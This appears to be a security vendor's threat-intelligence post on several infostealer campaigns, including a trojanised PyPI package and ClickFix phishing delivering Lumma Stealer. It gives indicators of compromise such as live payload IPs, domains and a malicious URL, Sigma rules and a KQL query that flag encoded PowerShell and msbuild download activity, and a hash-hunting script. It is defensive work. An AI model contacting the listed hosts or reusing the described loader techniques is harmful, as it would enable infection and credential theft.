Back to Intelligence

TeamPCP PyPI Attack & Multi-Vector Infostealer Campaigns: OTX Pulse Analysis — Enterprise Detection Pack

SA
Security Arsenal Team
April 30, 2026
6 min read

Recent OTX pulses indicate a convergence of sophisticated credential theft campaigns leveraging diverse infection vectors, including software supply chain compromises, social engineering, and mobile trojans.

  • TeamPCP has weaponized the telnyx Python SDK (750k monthly downloads) via PyPI, employing steganography to hide payloads in WAV files and utilizing msbuild.exe for execution.
  • LofyStealer (GrabBot) targets gamers via a Node.js loader that deploys an in-memory C++ payload to harvest browser data.
  • GhostSocks, a GoLang-based proxy service, is partnering with Lumma Stealer to turn compromised devices into residential proxy nodes, specifically targeting the education sector.
  • ClickFix-style phishing campaigns are distributing Lumma Stealer via obfuscated PowerShell and MSI payloads using DLL sideloading.
  • KYCShadow, an Android banking trojan, is targeting Indian users through WhatsApp with fake KYC workflows to steal OTPs and credentials.

Collectively, these threats demonstrate a shift toward complex loaders (Node.js, PowerShell, MSBuild) and the abuse of legitimate developer infrastructure to bypass static defenses.

Threat Actor / Malware Profile

Malware FamilyThreat ActorDistribution MethodPayload BehaviorC2 / Evasion
TeamPCPTeamPCPPyPI Supply Chain (Telnyx SDK)3-stage: Trojanized package -> Loader -> Steganography (WAV) -> Credential HarvesterSteganography; msbuild.exe for execution; sysmon.py usage.
LofyStealerLofyGangSocial Engineering (Minecraft)Node.js loader (53.5MB) + In-memory C++ payload (1.4MB); steals browser data/cookies.Syscalls evasion; in-memory execution; disguised as legitimate libraries.
GhostSocksGhostSocksMaaS / Underground ForumsGoLang binary; Turns devices into SOCKS5 residential proxies.TLS encryption; blends into normal network traffic; partners with Lumma.
Lumma StealerUnknownClickFix Phishing (Tech Support Scams)HijackLoader; DLL sideloading; Infostealer (logs, passwords).Obfuscated PowerShell; Renamed legitimate binaries; MSI payloads.
KYCShadowUnknownWhatsApp DistributionFake KYC App; Multi-stage dropper; WebView phishing; SMS interception.Firebase-based remote execution; VPN manipulation; Native code obfuscation.

IOC Analysis

The provided indicators span multiple infrastructure types essential for C2 and payload delivery:

  • Domains & Hostnames: Several typosquatted or suspicious domains (e.g., aquasecurtiy.org, retreaw.click, serv.xyz). These should be blocked at the DNS level.
  • IP Addresses: Includes IPs associated with C2 infrastructure and payload hosting (e.g., 85.11.161.198, 24.152.36.241). These should be blocked on perimeter firewalls.
  • File Hashes: A mix of MD5, SHA1, and SHA256 hashes for loaders (Node.js), payloads (C++), and malicious installers (MSI). These are critical for EDR correlation and disk scanning.
  • URLs: Specific URLs hosting malicious payloads (e.g., http://85.11.161.198:6600/...msi). SOC teams should extract and block these URLs in secure web gateways.

Operationalization:

  • SIEM: Ingest IOC lists as watchlists.
  • EDR: Trigger isolation or full scan on hash matches.
  • Network: Blocklisted domains/IPs on firewall/proxy.

Detection Engineering

Sigma Rules

YAML
---
title: Potential TeamPCP PyPI Supply Chain Attack - MSBuild Execution
description: Detects suspicious usage of msbuild.exe often associated with TeamPCP campaigns leveraging steganography and SDK exploitation.
id: 8a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/662ba0a0b1d9b3d9c0e1f2a3
tags:
  - attack.execution
  - attack.t1203
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\msbuild.exe'
    CommandLine|contains:
      - 'download'
      - 'http'
      - 'python'
  condition: selection
falsepositives:
  - Legitimate developer build processes
level: high
---
title: Suspicious PowerShell Encoded Command - ClickFix/Lumma Indicator
description: Detects obfuscated PowerShell commands often used in ClickFix campaigns to deliver Lumma Stealer via MSI payloads.
id: 9d0e1f2a-3b4c-5d6e-7f8a-9b0c1d2e3f4a
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/662ba0a0b1d9b3d9c0e1f2a4
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection_powershell:
    Image|endswith: '\powershell.exe'
  selection_encoded:
    CommandLine|contains: ' -enc ' 
  selection_length:
    CommandLine|re: '.{200,}' # Long obfuscated strings
  condition: all of selection_*
falsepositives:
  - Legitimate system administration scripts
level: high
---
title: Node.js Loader Spawning Suspicious Processes - LofyStealer
description: Detects Node.js process spawning non-node child processes, indicative of the LofyStealer loader deploying a C++ payload.
id: 0a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5e
status: experimental
date: 2026/05/01
author: Security Arsenal
references:
  - https://otx.alienvault.com/pulse/662ba0a0b1d9b3d9c0e1f2a5
tags:
  - attack.execution
  - attack.t1059
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith: '\node.exe'
  selection_child:
    Image|endswith:
      - '.exe'
      - '.dll'
    Image|notcontains: 'node'
  condition: selection_parent and selection_child
falsepositives:
  - Legitimate Node.js development servers
level: medium

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix PowerShell and Network IOCs
let IOCs = dynamic(["85.11.161.198", "24.152.36.241", "retreaw.click", "serv.biz", "aquasecurtiy.org"]);
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has "-enc" or ProcessCommandLine has "DownloadString"
| extend EncodedLength = strlen(ProcessCommandLine)
| where EncodedLength > 200
| join kind=inner (DeviceNetworkEvents | where Timestamp > ago(7d) | where RemoteUrl has_any(IOCs) or RemoteIP has_any(IOCs)) on DeviceId
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine, RemoteUrl, RemoteIP

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    IOC Hunt Script for TeamPCP, LofyStealer, and Lumma Stealer.
.DESCRIPTION
    Scans specific directories for known malicious file hashes provided in OTX pulses.
#>

$TargetHashes = @(
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
    "d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7",
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc",
    "c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728"
)

$SearchPaths = @("$env:USERPROFILE\AppData", "$env:TEMP", "C:\ProgramData", "$env:PROGRAMFILES")

Write-Host "[+] Starting IOC Hunt for OTX Pulses (2026-05-01)..." -ForegroundColor Cyan

foreach ($Path in $SearchPaths) {
    if (Test-Path $Path) {
        Write-Host "[*] Scanning $Path..." -ForegroundColor Yellow
        Get-ChildItem -Path $Path -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
            $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($Hash -in $TargetHashes) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
                Write-Host "    SHA256: $Hash" -ForegroundColor Red
            }
        }
    }
}
Write-Host "[+] Scan complete." -ForegroundColor Cyan


# Response Priorities

*   **Immediate**:
    *   Block all identified IOCs (IPs, Domains, URLs) at the firewall and proxy level.
    *   Isolate endpoints with positive hash matches for TeamPCP or LofyStealer.
    *   Hunt for `msbuild.exe` spawning from non-standard parent processes.

*   **24 Hours**:
    *   Conduct credential audits and forced password resets for accounts accessed from devices flagged by GhostSocks proxy indicators.
    *   Review authentication logs for anomalies originating from the geo-locations associated with KYCShadow targeting.
    *   Audit Python environments (`pip list`) for the malicious `telnyx` package versions.

*   **1 Week**:
    *   Implement software supply chain controls (SBOM verification) for internal development teams using PyPI.
    *   Harden browser policies to restrict extension installs (mitigating LofyStealer vectors).
    *   Deploy application control policies to block unsigned Node.js loaders and MSI downloads from the internet.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-credentialsteampcplumma-stealerlofystealerkycshadowinfostealer

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action